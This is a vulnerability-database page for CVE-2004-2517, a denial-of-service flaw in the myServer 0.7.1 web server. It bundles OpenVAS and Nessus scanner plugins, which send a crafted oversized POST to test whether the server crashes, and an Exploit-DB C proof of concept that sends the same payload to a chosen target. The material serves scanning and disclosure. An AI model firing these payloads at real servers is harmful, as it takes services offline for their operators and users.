ID OPENVAS:14838 Type openvas Reporter This script is Copyright (C) 2004 David Maciejak Modified 2017-12-07T00:00:00
Description
The remote host is running myServer, an open-source http server.
This version is vulnerable to remote denial of service attack.
With a specially crafted HTTP POST request, an attacker can cause the service
to stop responding.
# OpenVAS Vulnerability Test
# $Id: myserver_post_dos.nasl 8023 2017-12-07 08:36:26Z teissa $
# Description: myServer POST Denial of Service
#
# Authors:
# David Maciejak <david dot maciejak at kyxar dot fr>
# based on work from (C) Tenable Network Security
#
# Copyright:
# Copyright (C) 2004 David Maciejak
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
tag_summary = "The remote host is running myServer, an open-source http server.
This version is vulnerable to remote denial of service attack.
With a specially crafted HTTP POST request, an attacker can cause the service
to stop responding.";
tag_solution = "Upgrade to the latest version of this software or use another web server";
# Ref: badpack3t <badpack3t@security-protocols.com> for .:sp research labs:.
if(description)
{
script_id(14838);
script_version("$Revision: 8023 $");
script_tag(name:"last_modification", value:"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_xref(name:"OSVDB", value:"10333");
script_cve_id("CVE-2004-2517");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
name = "myServer POST Denial of Service";
script_name(name);
script_category(ACT_MIXED_ATTACK);
script_tag(name:"qod_type", value:"remote_banner");
script_copyright("This script is Copyright (C) 2004 David Maciejak");
family = "Web application abuses";
script_family(family);
script_dependencies("gb_get_http_banner.nasl");
script_mandatory_keys("MyServer/banner");
script_exclude_keys("www/too_long_url_crash");
script_require_ports("Services/www", 80);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
exit(0);
}
#
# The script code starts here
#
include("http_func.inc");
port = get_http_port(default:80);
if(get_port_state(port))
{
banner = get_http_banner(port:port);
if(!banner) exit(0);
if ( "MyServer" >!< banner ) exit(0);
if (safe_checks())
{
#Server: MyServer 0.7.1
if(egrep(pattern:"^Server: *MyServer 0\.([0-6]\.|7\.[0-1])[^0-9]", string:banner))
{
security_message(port);
}
exit(0);
}
else
{
if(http_is_dead(port:port))exit(0);
data = http_post(item:string("index.html?View=Logon HTTP/1.1\r\n", crap(520), ": ihack.ms\r\n\r\n"), port:port);
soc = http_open_socket(port);
if(soc > 0)
{
send(socket:soc, data:data);
http_close_socket(soc);
sleep(1);
soc2 = http_open_socket(port);
if(!soc2)
{
security_message(port);
}
else http_close_socket(soc2);
}
}
}
{"id": "OPENVAS:14838", "type": "openvas", "bulletinFamily": "scanner", "title": "myServer POST Denial of Service", "description": "The remote host is running myServer, an open-source http server.\nThis version is vulnerable to remote denial of service attack.\n\nWith a specially crafted HTTP POST request, an attacker can cause the service \nto stop responding.", "published": "2005-11-03T00:00:00", "modified": "2017-12-07T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=14838", "reporter": "This script is Copyright (C) 2004 David Maciejak", "references": ["10333"], "cvelist": ["CVE-2004-2517"], "lastseen": "2017-12-08T11:44:07", "viewCount": 1, "enchantments": {"score": {"value": 5.3, "vector": "NONE", "modified": "2017-12-08T11:44:07", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-10333", "CVE-2004-2517", "CVE-2019-10333", "CVE-2017-10333"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231014838"]}, {"type": "exploitdb", "idList": ["EDB-ID:10333", "EDB-ID:551"]}, {"type": "nessus", "idList": ["MYSERVER_POST_DOS.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:10333"]}, {"type": "seebug", "idList": ["SSV:10333"]}, {"type": "zdt", "idList": ["1337DAY-ID-10333"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10333"]}, {"type": "ossfuzz", "idList": ["OSSFUZZ-10333"]}], "modified": "2017-12-08T11:44:07", "rev": 2}, "vulnersScore": 5.3}, "pluginID": "14838", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: myserver_post_dos.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: myServer POST Denial of Service\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n# based on work from (C) Tenable Network Security\n#\n# Copyright:\n# Copyright (C) 2004 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"The remote host is running myServer, an open-source http server.\nThis version is vulnerable to remote denial of service attack.\n\nWith a specially crafted HTTP POST request, an attacker can cause the service \nto stop responding.\";\n\ntag_solution = \"Upgrade to the latest version of this software or use another web server\";\n\n# Ref: badpack3t <badpack3t@security-protocols.com> for .:sp research labs:.\n\nif(description)\n{\n script_id(14838);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_xref(name:\"OSVDB\", value:\"10333\");\n script_cve_id(\"CVE-2004-2517\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n name = \"myServer POST Denial of Service\";\n script_name(name);\n \n\n \n script_category(ACT_MIXED_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n \n script_copyright(\"This script is Copyright (C) 2004 David Maciejak\");\n family = \"Web application abuses\";\n script_family(family);\n \n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"MyServer/banner\");\n script_exclude_keys(\"www/too_long_url_crash\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\nif(get_port_state(port))\n{\n banner = get_http_banner(port:port);\n if(!banner) exit(0);\n if ( \"MyServer\" >!< banner ) exit(0);\n\n if (safe_checks())\n {\n \t#Server: MyServer 0.7.1\n \tif(egrep(pattern:\"^Server: *MyServer 0\\.([0-6]\\.|7\\.[0-1])[^0-9]\", string:banner))\n {\n security_message(port);\n }\n exit(0);\n }\n else\n {\n if(http_is_dead(port:port))exit(0);\n data = http_post(item:string(\"index.html?View=Logon HTTP/1.1\\r\\n\", crap(520), \": ihack.ms\\r\\n\\r\\n\"), port:port); \n soc = http_open_socket(port);\n if(soc > 0)\n {\n send(socket:soc, data:data);\n http_close_socket(soc);\n sleep(1);\n soc2 = http_open_socket(port);\n if(!soc2)\n {\n\tsecurity_message(port);\n }\n else http_close_socket(soc2);\n }\n }\n}\n", "naslFamily": "Web application abuses"}
{"cve": [{"lastseen": "2021-02-02T05:23:01", "description": "myServer 0.7.1 allows remote attackers to cause a denial of service (crash) via a long HTTP POST request in a View=Logon operation to index.html.", "edition": 4, "cvss3": {}, "published": "2004-12-31T05:00:00", "title": "CVE-2004-2517", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-2517"], "modified": "2017-07-11T01:31:00", "cpe": ["cpe:/a:myserver:myserver:0.7.1"], "id": "CVE-2004-2517", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2517", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:myserver:myserver:0.7.1:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T15:08:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-2517"], "description": "This version of myServer is vulnerable to remote denial of service attack.", "modified": "2020-05-08T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231014838", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231014838", "type": "openvas", "title": "myServer POST Denial of Service", "sourceData": "# OpenVAS Vulnerability Test\n# Description: myServer POST Denial of Service\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n# based on work from (C) Tenable Network Security\n#\n# Copyright:\n# Copyright (C) 2004 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.14838\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_xref(name:\"OSVDB\", value:\"10333\");\n script_cve_id(\"CVE-2004-2517\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"myServer POST Denial of Service\");\n script_category(ACT_MIXED_ATTACK);\n script_copyright(\"Copyright (C) 2004 David Maciejak\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"MyServer/banner\");\n script_exclude_keys(\"www/too_long_url_crash\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"solution\", value:\"Upgrade to the latest version of this software or use another web serve.r\");\n\n script_tag(name:\"summary\", value:\"This version of myServer is vulnerable to remote denial of service attack.\");\n\n script_tag(name:\"impact\", value:\"With a specially crafted HTTP POST request, an attacker can cause the service\n to stop responding.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port(default:80);\nbanner = http_get_remote_headers(port:port);\nif(!banner || \"MyServer\" >!< banner)\n exit(0);\n\nif(safe_checks()) {\n #Server: MyServer 0.7.1\n if(egrep(pattern:\"^Server: *MyServer 0\\.([0-6]\\.|7\\.[01])[^0-9]\", string:banner)) {\n security_message(port:port);\n exit(0);\n }\n exit(99);\n} else {\n\n if(http_is_dead(port:port))\n exit(0);\n\n data = http_post(item:string(\"index.html?View=Logon HTTP/1.1\\r\\n\", crap(520), \": ihack.ms\\r\\n\\r\\n\"), port:port);\n soc = http_open_socket(port);\n if(!soc)\n exit(0);\n\n send(socket:soc, data:data);\n http_close_socket(soc);\n sleep(1);\n soc2 = http_open_socket(port);\n if(!soc2) {\n security_message(port:port);\n } else {\n http_close_socket(soc2);\n }\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T12:26:45", "description": "MyServer 0.7.1 (POST) Denial Of Service Exploit. CVE-2004-2517. Dos exploit for linux platform", "published": "2004-09-27T00:00:00", "type": "exploitdb", "title": "MyServer 0.7.1 POST Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2517"], "modified": "2004-09-27T00:00:00", "id": "EDB-ID:551", "href": "https://www.exploit-db.com/exploits/551/", "sourceData": "/****************************/ \r\nPoC to crash the server \r\n/****************************/ \r\n\r\n/* MyServer 0.7.1 POST Denial Of Service \r\nvendor URL: \r\nhttp://www.myserverproject.net \r\n\r\ncoded and discovered by: \r\nbadpack3t \r\nfor .:sp research labs:. \r\nwww.security-protocols.com \r\n9.20.2004 \r\nTested on Mandrake 10.0 \r\n\r\nusage: \r\nsp-myserv-0.7.1 [targetport] (default is 80) \r\n*/ \r\n\r\n#include <'winsock2.h> \r\n#include <'stdio.h> \r\n\r\n#pragma comment(lib, \"ws2_32.lib\") \r\n\r\nchar exploit[] = \r\n\r\n\"POST index.html?View=Logon HTTP/1.1 \" \r\n\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" \r\n\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" \r\n\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" \r\n\": ihack.ms \"; \r\n\r\nint main(int argc, char *argv[]) \r\n{ \r\nWSADATA wsaData; \r\nWORD wVersionRequested; \r\nstruct hostent *pTarget; \r\nstruct sockaddr_in sock; \r\nchar *target; \r\nint port,bufsize; \r\nSOCKET mysocket; \r\n\r\nif (argc < 2) \r\n{ \r\nprintf(\"MyServer 0.7.1 POST DoS by badpack3t \", argv[0]); \r\nprintf(\"Usage: %s [targetport] (default is 80) \", argv[0]); \r\nprintf(\"www.security-protocols.com \", argv[0]); \r\nexit(1); \r\n} \r\n\r\nwVersionRequested = MAKEWORD(1, 1); \r\nif (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; \r\n\r\ntarget = argv[1]; \r\nport = 80; \r\n\r\nif (argc >= 3) port = atoi(argv[2]); \r\nbufsize = 1024; \r\nif (argc >= 4) bufsize = atoi(argv[3]); \r\n\r\nmysocket = socket(AF_INET, SOCK_STREAM, 0); \r\nif(mysocket==INVALID_SOCKET) \r\n{ \r\nprintf(\"Socket error! \"); \r\nexit(1); \r\n} \r\n\r\nprintf(\"Resolving Hostnames... \"); \r\nif ((pTarget = gethostbyname(target)) == NULL) \r\n{ \r\nprintf(\"Resolve of %s failed \", argv[1]); \r\nexit(1); \r\n} \r\n\r\nmemcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); \r\nsock.sin_family = AF_INET; \r\nsock.sin_port = htons((USHORT)port); \r\n\r\nprintf(\"Connecting... \"); \r\nif ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))) \r\n{ \r\nprintf(\"Couldn't connect to host. \"); \r\nexit(1); \r\n} \r\n\r\nprintf(\"Connected!... \"); \r\nprintf(\"Sending Payload... \"); \r\nif (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1) \r\n{ \r\nprintf(\"Error Sending the Exploit Payload \"); \r\nclosesocket(mysocket); \r\nexit(1); \r\n} \r\n\r\nprintf(\"Payload has been sent! Check if the webserver is dead! \"); \r\nclosesocket(mysocket); \r\nWSACleanup(); \r\nreturn 0; \r\n}\n\n// milw0rm.com [2004-09-27]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/551/"}], "nessus": [{"lastseen": "2020-09-14T16:24:33", "description": "The remote host is running MyServer, an open source web server. The\ninstalled version is vulnerable to remote denial of service attack. \nUsing a specially crafted HTTP POST request to 'index.html' when\n'View' is set to 'Logon', an unauthenticated, remote attacker can cause\nthe server to stop responding.", "edition": 18, "published": "2004-09-28T00:00:00", "title": "MyServer HTTP POST Request Remote Overflow DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-2517"], "modified": "2004-09-28T00:00:00", "cpe": ["cpe:/a:myserver:myserver"], "id": "MYSERVER_POST_DOS.NASL", "href": "https://www.tenable.com/plugins/nessus/14838", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(14838);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\n\n script_cve_id(\"CVE-2004-2517\");\n script_xref(name:\"Secunia\", value:\"12640\");\n\n script_name(english: \"MyServer HTTP POST Request Remote Overflow DoS\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is susceptible to a denial of service attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running MyServer, an open source web server. The\ninstalled version is vulnerable to remote denial of service attack. \nUsing a specially crafted HTTP POST request to 'index.html' when\n'View' is set to 'Logon', an unauthenticated, remote attacker can cause\nthe server to stop responding.\" );\n # http://web.archive.org/web/20051016184445/http://fux0r.phathookups.com/advisory/sp-x14-advisory.txt \n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?913eb7d4\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://sourceforge.net/project/shownotes.php?release_id=270736\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the MyServer version 0.7.2 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/09/28\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2004/09/23\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value: \"cpe:/a:myserver:myserver\");\nscript_end_attributes();\n\n script_summary(english: \"Test POST DoS on MyServer\");\n \n script_category(ACT_MIXED_ATTACK);\n\n script_copyright(english:\"This script is Copyright (C) 2004-2020 Tenable Network Security, Inc.\");\n script_family(english: \"Web Servers\");\n \n script_dependencie(\"http_version.nasl\", \"www_too_long_url.nasl\");\n script_exclude_keys(\"www/too_long_url_crash\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80, embedded:TRUE);\n\nif(get_port_state(port))\n{\n banner = get_http_banner(port:port);\n if(!banner) exit(0);\n if ( \"MyServer\" >!< banner ) exit(0);\n\n if (safe_checks())\n {\n \t#Server: MyServer 0.7.1\n \tif(egrep(pattern:\"^Server: *MyServer 0\\.([0-6]\\.|7\\.[0-1])[^0-9]\", string:banner))\n {\n security_warning(port);\n }\n exit(0);\n }\n else\n {\n if(http_is_dead(port:port))exit(0);\n data = http_post(item:string(\"index.html?View=Logon HTTP/1.1\\r\\n\", crap(520), \": ihack.ms\\r\\n\\r\\n\"), port:port); \n soc = http_open_socket(port);\n if(soc > 0)\n {\n send(socket:soc, data:data);\n http_close_socket(soc);\n sleep(1);\n soc2 = http_open_socket(port);\n if(!soc2)\n {\n\tsecurity_warning(port);\n }\n else http_close_socket(soc2);\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}
